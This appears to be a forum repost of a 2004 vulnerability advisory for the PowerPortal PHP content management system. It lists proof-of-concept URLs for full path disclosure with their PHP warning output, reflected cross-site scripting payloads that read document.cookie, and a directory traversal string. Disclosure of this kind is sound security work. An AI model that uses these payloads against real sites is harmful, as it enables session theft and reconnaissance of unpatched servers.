Multiple vulnerabilities PowerPortal

serverplan · #1 (**permalink**) 29-06-2004, 00.52.00

http://www.swp-zone.org/archivos/advisory-07.txt

-------------------------------------------------------------------------------------------------

:.: Multiple vulnerabilities PowerPortal :.:

PROGRAM: PowerPortal
HOMEPAGE: http://powerportal.sourceforge.net/
VERSION: v1.x
BUG: Multiple vulnerabilities
DATE: 23/05/2004
AUTHOR: DarkBicho
web: http://www.darkbicho.tk
team: Security Wari Proyects <www.swp-zone.org>
Email: darkbicho@peru.com

-------------------------------------------------------------------------------------------------

1.- Affected software description:
------------------------------

PowerPortal is a popular content management system, written in php

2.- Vulnerabilities:
---------------

A. Full path disclosure:

This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive
information.

:.: Examples:

* http://attacker/modules/gallery/resize.php

Warning: imagecreatetruecolor(): Invalid image dimensions in
c:\appserv\www\power\modules\gallery\resize.php on line
18

Warning: imagecopyresized(): supplied argument is not a
valid Image resource in
c:\appserv\www\power\modules\gallery\resize.php on line
20

Warning: imagejpeg(): supplied argument is not a valid Image
resource in
c:\appserv\www\power\modules\gallery\resize.php on line
23

* http://attacker/power/modules.php?na...iles=darkbicho

Warning:
opendir(c:\appserv\www\power\modules\gallery/../../modules/gallery/images/darkbicho):
failed to open dir: Invalid argument in
c:\appserv\www\power\modules\gallery\index.php on
line 99

B. Cross-Site Scripting aka XSS:

http://attacker/modules.php?name=private_messages&file=reply&id='> <script>alert(document.cookie);</script>
http://attacker/modules.php?name=links&search=<script>alert(docume nt.cookie);</script>&func=search_results
http://attacker/modules.php?name=content&file=search&search=<scrip t>alert(document.cookie);</script>&func=results
http://attacker/modules.php?name=gallery&files=<script>alert(docum ent.cookie);</script>

C. Arbitrary directory browsing:

* http://attacker/modules.php?name=gal...les=/../../../

3.- SOLUTION:
????????
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the PowerPortal website for updates and official release
details.

4.- Greetings:
---------

greetings to my Peruvian group swp and perunderforce

"EL PISCO ES Y SERA PERUANO"

5.- Contact
-------

WEB: http://www.darkbicho.tk
EMAIL: darkbicho@peru.com

-------------------------------------------------------------------------------------------------
___________ ____________
/ _____/ \ / \______ \
\_____ \\ \/\/ /| ___/
/ \\ / | |
/_______ / \__/\ / |____|
\/ \/

Security Wari Projects
(c) 2002 - 2004
Made in Peru

----------------------------------------[ EOF

Strumenti discussione
Visualizza versione stampabile Invia questa pagina via e-mail
Modalità visualizzazione
Modalità lineare Modalità ibrida Modalità elencata

Discussioni simili
Discussione	Autore discussione	Forum	Risposte	Ultimo messaggio
phpBB Multiple Vulnerabilities	serverplan	Vulnerabilità	0	02-11-2005 19.32.14
phpBB 2.0.14 Multiple Vulnerabilities	serverplan	Vulnerabilità	2	08-05-2005 03.27.00
Multiple Vulnerabilities in WebCalendar	serverplan	Vulnerabilità	0	10-11-2004 21.08.42
Multiple Vulnerabilities phpWebsite	serverplan	Vulnerabilità	0	02-09-2004 23.11.07
Multiple vulnerabilities in XMB 1.8	serverplan	Vulnerabilità	0	23-02-2004 23.35.52